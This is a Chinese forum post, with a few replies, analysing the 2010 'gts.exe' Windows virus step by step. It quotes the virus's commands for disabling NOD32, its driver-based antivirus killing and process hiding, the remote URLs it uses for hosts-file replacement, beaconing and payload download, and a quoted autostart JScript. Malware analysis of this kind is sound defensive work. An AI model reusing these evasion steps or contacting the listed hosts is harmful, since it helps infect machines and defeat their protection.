gts.exe病毒详细分析
病毒时间戳:2010-09-07,dll和sys是09年的时间戳,代码太多,我在附件中上传了各个部分的idb和病毒样本,想了解的朋友可以看下,虽然我注释很少~作者:pencil yy3是我临时用的账号~~主体gts.exe:
执行cmd /c sc config ekrn start= disabled 取消NOD32服务的自启动
cmd.exe /c taskkill.exe /im ekrn.exe /f 强行终止ekrn.exe进程
强行终止egui.exe进程
在%Windir%/下创建以开机时间为名的te%dt.dll文件
取出自身129号资源,并循环把各个byte内容加5,写入到创建的dll中
向rundll32.exe注入释放的dll并运行testall函数
删除释放的dll文件
在%Windir%\下创建随机名.exe
提取自身101号资源,解码后写入创建的exe中
运行创建的exe
创建pcidump.sys驱动,并提取自身125号资源写入
创建pcidump服务关联文件pcidump.sys,启动方式为SERVICE_DEMAND_START,并立即启动服
务向\\.\pcidump发送病毒进程名,用于隐藏
删除pcidump服务
删除释放的驱动文件
把当前病毒体复制到%Windir%\\system32\\下
删除病毒体镜像本身
dll文件:
提权
查找瑞星CCENTER.EXE进程(还对卡巴斯基进行判断)
如没有avp.exe则借用aec.sys的壳,否则借用AsyncMac.sys,如果有avp.exe,则会出现bug(改aec.sys的属性,然后删除AsyncMac.sys)
去掉\\drivers\\aec.sys的文件保护属性(此处有bug)
删除\\drivers\\AsyncMac.sys
创建\\drivers\\AsyncMac.sys,读取本身101号资源,每字节内容+5来解码,然后写入创建的驱动中创建名为AsyncMac的服务,关联文件\\drivers\\AsyncMac.sys,并启动
打开\\.\KILLPS_Drv
查找68种反病毒软件的进程,如果发现,则发送控制码2236420,附带进程ID到驱动,并删除其相关服务和exe文件
停止AsyncMac服务
删除\\drivers\\AsyncMac.sys
删除瑞星相关服务
随机名.exe文件:
创建XETTETT......Mutex,避免重复感染
关闭服务ALG和wscsvc
修改系统目录权限为everyone
修改临时文件夹权限为everyone
添加注册表项CurrentVersion\Run下项RsTray,值C:\WINDOWS\system32\scvhost.exe
创建线程
在线程中下载http://ff.the88888.com:18185/qvod/host.txt,覆盖掉%Windir%\drivers\etc\hosts,并设置文件属性为只读
等待上一个线程完成后再创建一个线程
在线程中首先测试网络状态
然后访问http://tj19.x9wdns.com:2787/q2/tj.html?mac=XX:XX:XX&ver=10830&os=XXX&dtime=2010-8-3
向远端服务器发送数据
等待线程完成后再创建一个线程,再访问一次http://tj19.x9wdns.com:2787/q2/tj.html?mac=XX:XX:XX&ver=10830&os=XXX&dtime=2010-8-3
从远端服务器http://ll.best88888.com:88/C/CXX.exe下载exe文件,保存到系统目录下
A\smss.exe
在启动目录中创建run.jse
内容如下:
var WSH = new ActiveXObject("WScript.Shell");
var fso = new ActiveXObject("Scripting.FileSystemObject");
if(fso.FileExists("c:\\windows\\a\\smss.exe "))
{
WSH.Run("c:\\windows\\a\\smss.exe ");
}
添加run.jse到自启动项
pcidump.sys:
创建设备\Device\pcidump
创建符号链接\DosDevices\pcidump
FSD HOOK"\FileSystem\FastFat"和"NTFS"的IRP_MJ_CREATE派遣例程,来保护病毒进程
SSDT HOOK "ZwQuerySystemInfomation" 隐藏gts.exe进程
对易速磁盘还原系统做了穿透处理
ace.sys:kill AV
smss:浏览广告
好详细的分析,没想到我居然看懂了!!! 账号注册成功~:victory: 账号注册成功~
pencil 发表于 2010-9-17 07:08 http://www.52pojie.cn/images/common/back.gif
pencil兄以后多来吾爱破解发布分析作品来让大家学习啊. pencil兄以后多来吾爱破解发布分析作品来让大家学习啊.
Hmily 发表于 2010-9-18 01:35 http://www.52pojie.cn/images/common/back.gif
承蒙Hmily大牛抬举,小弟多多努力。:victory: 支持了 很好的东西 支持个,。6月的东西爆发过。阻止创建设备\Device\pcidump还原就没事。ACE。SYS暂时还不知道怎么弄。其他无威胁 支持个,。6月的东西爆发过。阻止创建设备\Device\pcidump还原就没事。ACE。SYS暂时还不知道怎么弄。其他无 ...
toolpc 发表于 2010-9-18 19:42 http://www.52pojie.cn/images/common/back.gif
直接kill掉了事。研究每个怎么阻止干嘛。 大作,拜读~要是注释详尽点就完美了……期待更多文章! 可以防创建设备破坏还原系统